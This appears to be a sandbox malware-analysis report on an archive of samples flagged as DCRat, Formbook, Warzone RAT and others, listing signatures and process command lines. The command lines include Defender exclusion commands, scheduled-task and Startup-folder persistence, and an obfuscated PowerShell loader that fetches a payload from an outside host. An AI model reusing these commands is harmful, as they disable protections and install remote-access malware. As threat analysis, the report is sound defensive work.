Analysis Overview
SHA256
e33f116c4d031b092c1aa75e0cb68b5db4e362739a6b41c27475c3a0ddb32b3a
Threat Level: Known bad
The file 2023-08-17-18.zip was found to be: Known bad.
Malicious Activity Summary
Dcrat family
Formbook
WarzoneRat, AveMaria
Amadey family
DcRat
WSHRAT
DCRat payload
DCRat payload
Formbook payload
Warzone RAT payload
Office macro that triggers on suspicious action
Suspicious Office macro
Looks up external IP address via web service
Unsigned PE
Program crash
NSIS installer
Office document contains embedded OLE objects
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Creates scheduled task(s)
Suspicious use of AdjustPrivilegeToken
Runs ping.exe
Gathers network information
Suspicious behavior: AddClipboardFormatListener
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-17 19:40
Signatures
Amadey family
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Dcrat family
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Office document contains embedded OLE objects
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-17 19:39
Reported
2023-08-17 19:50
Platform
win10v2004-20230703-en
Max time kernel
68s
Max time network
577s
Command Line
Signatures
DcRat
Formbook
WSHRAT
WarzoneRat, AveMaria
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Formbook payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Warzone RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Program crash
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\ipconfig.exe | N/A |
Office document contains embedded OLE objects
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\2023-08-17-18.zip
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\2023-08-17-18\" -spe -an -ai#7zMap7070:84:7zEvent9404
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\0bc5ba29090a537426e9f198bc924a23403155a2dcb848a58280f6205f4fd6c1.xls"
C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe
"C:\Users\Admin\Desktop\2023-08-17-18\0cdcc03848c1c403215a2e8445c3918f893ee145d4ea5b175d62bf47de0dfb35.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\Desktop\2023-08-17-18\4e8d2ed372068535d420927ad0f59dd34eda4f33f7bafcec6b694379b8948487.jar"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\7a57c3bcbdfc2482505bcf4c20885c1288635f780667a5cf4c7f0804251dd719.js"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TGDEJN.vbs"
C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\9c60202f8f982a2cd9c02450186b611e472ea1f842e6ba6bdaa7eddcf8f254e5.exe"
C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe
"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"
C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe
"C:\Users\Admin\Desktop\2023-08-17-18\6d0fee7a64435cda0b8ac5652c5a19e9e284514bec8110ae7c02341dcc3e1277.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aug.vbs"
C:\Users\Admin\AppData\Local\Tempwinlogon.exe
"C:\Users\Admin\AppData\Local\Tempwinlogon.exe"
C:\ProgramData\images.exe
"C:\ProgramData\images.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"
C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe
"C:\Users\Admin\Desktop\2023-08-17-18\23a0504b8ac3cb1b913d15da848866607a4c617b8bbb5555a71962a6cffadeed.exe"
C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe
"C:\Users\Admin\Desktop\2023-08-17-18\84a8f72750a06cff2cc98a0d4b012821666e089304cfdd3cdde04866876a8fa8.exe"
C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe
"C:\Users\Admin\Desktop\2023-08-17-18\82d48c9bb4936387228e0de374d235ac364bd4011519b988623707cb7025150f.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe
"C:\Users\Admin\Desktop\2023-08-17-18\76fb6717f8683e5d892659a5e1163f424596b0f61c221ae6c677707ae94387dc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4088 -ip 4088
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Desktop\2023-08-17-18\940387888527e0efd604a126935a6174423ce34d15dc1fd7b7c894b78985ad71.rtf" /o ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 1324
C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"
C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe
"C:\Users\Admin\Desktop\2023-08-17-18\fbde150ed1511eaf87ff2ef7c8ac5f9cf9dedce7953af526ef8622a4ef73971a.exe"
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\2023-08-17-18\f97b4c1a380242c5efa234bd8ae966805071ff7dcf10ac44e69cdc9dd1a7eb1b.xlsx"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f8ee97725f7f1cdf37b5899e287c8497293e76ab372ee22bd9922ba3624e1b52.exe"
C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"
C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe
"C:\Users\Admin\Desktop\2023-08-17-18\1f3138026ba3af1ba357d822d95ef957d2661426ab28a7203263d8239b63dafa.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"
C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe
"C:\Users\Admin\Desktop\2023-08-17-18\b0351062f7da26f1a85c0e6ed3edeb701aec500391a62b8f382f97084b395749.exe"
C:\Windows\system32\PING.EXE
ping 127.0.0.1 -n 5
C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe
"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"
C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe
"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"
C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe
"C:\Users\Admin\Desktop\2023-08-17-18\328dcb82382c5fb34a7f5a4892cfbdeec6e990551f3ebdcdcfec98e70b0b0327.exe"
C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe
"C:\Users\Admin\Desktop\2023-08-17-18\305ae09b8151615601848a6caeae02a976701243a0cf217c75a3f0f8ee2aa911.exe"
C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\45a3e50d6aa0b1ef6a53d9859056f19c0d1e247986032a976d0b2f2b2a4ddd9b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe
"C:\Users\Admin\Desktop\2023-08-17-18\7bf46bf16be075a6c263a2e12339a9a01c96d933eb61b474002144bf7c7cc73b.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\RbsgeknsO.bat" "
C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe
"C:\Users\Admin\Desktop\2023-08-17-18\5dc3015899fea24b6c7b9099fc5e153a69395b4208a249cf9ab2ff9b26d7ae99.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\uiVprBevwjFGG.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uiVprBevwjFGG" /XML "C:\Users\Admin\AppData\Local\Temp\tmp50E0.tmp"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c mkdir "\\?\C:\Windows "
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe
"C:\Users\Admin\Desktop\2023-08-17-18\f9de5be5d337c16f6a3ad525011586ae0b14f04169e9b6ae61a35397a3311079.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\szBUFHBkBccpfd.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\szBUFHBkBccpfd" /XML "C:\Users\Admin\AppData\Local\Temp\tmp91D1.tmp"
C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe
"C:\Users\Admin\Desktop\2023-08-17-18\a0a349494a2ddb51929195de419866d0b0f1ba3569a6e0722f7be92c253132e5.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c ipconfig /release
C:\Windows\SysWOW64\ipconfig.exe
ipconfig /release
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\comRuntimeCrtdll\reJQeYd4I.vbe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Windows\system32\cmd.exe
cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\comRuntimeCrtdll\1yEJ1LJx7Aonc2gKvRqS.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Admin\Desktop\2023-08-17-18\e9030808d9eb24aba0aa124faebeecaa515b498d738bdb30414af6a15dc98120.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ POX.vbs')
C:\comRuntimeCrtdll\agentbrowser.exe
"C:\comRuntimeCrtdll\agentbrowser.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#VQBy#@$#Gw#@$#I#@$##@$#9#@$#C#@$##@$#JwBo#@$#HQ#@$#d#@$#Bw#@$#HM#@$#Og#@$#v#@$#C8#@$#dQBw#@$#Gw#@$#bwBh#@$#GQ#@$#Z#@$#Bl#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBu#@$#HM#@$#LgBj#@$#G8#@$#bQ#@$#u#@$#GI#@$#cg#@$#v#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBz#@$#C8#@$#M#@$##@$#w#@$#DQ#@$#Lw#@$#1#@$#DY#@$#Mw#@$#v#@$#DY#@$#Mg#@$#x#@$#C8#@$#bwBy#@$#Gk#@$#ZwBp#@$#G4#@$#YQBs#@$#C8#@$#dQBu#@$#Gk#@$#dgBl#@$#HI#@$#cwBv#@$#F8#@$#dgBi#@$#HM#@$#LgBq#@$#H#@$##@$#ZQBn#@$#D8#@$#MQ#@$#2#@$#Dk#@$#M#@$##@$#5#@$#DM#@$#MQ#@$#4#@$#DU#@$#NQ#@$#n#@$#Ds#@$#J#@$#B3#@$#GU#@$#YgBD#@$#Gw#@$#aQBl#@$#G4#@$#d#@$##@$#g#@$#D0#@$#I#@$#BO#@$#GU#@$#dw#@$#t#@$#E8#@$#YgBq#@$#GU#@$#YwB0#@$#C#@$##@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBO#@$#GU#@$#d#@$##@$#u#@$#Fc#@$#ZQBi#@$#EM#@$#b#@$#Bp#@$#GU#@$#bgB0#@$#Ds#@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#dwBl#@$#GI#@$#QwBs#@$#Gk#@$#ZQBu#@$#HQ#@$#LgBE#@$#G8#@$#dwBu#@$#Gw#@$#bwBh#@$#GQ#@$#R#@$#Bh#@$#HQ#@$#YQ#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FU#@$#cgBs#@$#Ck#@$#Ow#@$#k#@$#Gk#@$#bQBh#@$#Gc#@$#ZQBU#@$#GU#@$#e#@$#B0#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$#UwB5#@$#HM#@$#d#@$#Bl#@$#G0#@$#LgBU#@$#GU#@$#e#@$#B0#@$#C4#@$#RQBu#@$#GM#@$#bwBk#@$#Gk#@$#bgBn#@$#F0#@$#Og#@$#6#@$#FU#@$#V#@$#BG#@$#Dg#@$#LgBH#@$#GU#@$#d#@$#BT#@$#HQ#@$#cgBp#@$#G4#@$#Zw#@$#o#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#EI#@$#eQB0#@$#GU#@$#cw#@$#p#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#FM#@$#V#@$#BB#@$#FI#@$#V#@$##@$#+#@$#D4#@$#Jw#@$#7#@$#CQ#@$#ZQBu#@$#GQ#@$#RgBs#@$#GE#@$#Zw#@$#g#@$#D0#@$#I#@$##@$#n#@$#Dw#@$#P#@$#BC#@$#EE#@$#UwBF#@$#DY#@$#N#@$#Bf#@$#EU#@$#TgBE#@$#D4#@$#Pg#@$#n#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#PQ#@$#g#@$#CQ#@$#aQBt#@$#GE#@$#ZwBl#@$#FQ#@$#ZQB4#@$#HQ#@$#LgBJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#TwBm#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#p#@$#Ds#@$#J#@$#Bl#@$#G4#@$#Z#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#Ek#@$#bgBk#@$#GU#@$#e#@$#BP#@$#GY#@$#K#@$##@$#k#@$#GU#@$#bgBk#@$#EY#@$#b#@$#Bh#@$#Gc#@$#KQ#@$#7#@$#CQ#@$#cwB0#@$#GE#@$#cgB0#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwBl#@$#C#@$##@$#M#@$##@$#g#@$#C0#@$#YQBu#@$#GQ#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#ZwB0#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Ds#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#C#@$##@$#Kw#@$#9#@$#C#@$##@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#RgBs#@$#GE#@$#Zw#@$#u#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ds#@$#J#@$#Bi#@$#GE#@$#cwBl#@$#DY#@$#N#@$#BM#@$#GU#@$#bgBn#@$#HQ#@$#a#@$##@$#g#@$#D0#@$#I#@$##@$#k#@$#GU#@$#bgBk#@$#Ek#@$#bgBk#@$#GU#@$#e#@$##@$#g#@$#C0#@$#I#@$##@$#k#@$#HM#@$#d#@$#Bh#@$#HI#@$#d#@$#BJ#@$#G4#@$#Z#@$#Bl#@$#Hg#@$#Ow#@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#EM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#I#@$##@$#9#@$#C#@$##@$#J#@$#Bp#@$#G0#@$#YQBn#@$#GU#@$#V#@$#Bl#@$#Hg#@$#d#@$##@$#u#@$#FM#@$#dQBi#@$#HM#@$#d#@$#By#@$#Gk#@$#bgBn#@$#Cg#@$#J#@$#Bz#@$#HQ#@$#YQBy#@$#HQ#@$#SQBu#@$#GQ#@$#ZQB4#@$#Cw#@$#I#@$##@$#k#@$#GI#@$#YQBz#@$#GU#@$#Ng#@$#0#@$#Ew#@$#ZQBu#@$#Gc#@$#d#@$#Bo#@$#Ck#@$#Ow#@$#k#@$#GM#@$#bwBt#@$#G0#@$#YQBu#@$#GQ#@$#QgB5#@$#HQ#@$#ZQBz#@$#C#@$##@$#PQ#@$#g#@$#Fs#@$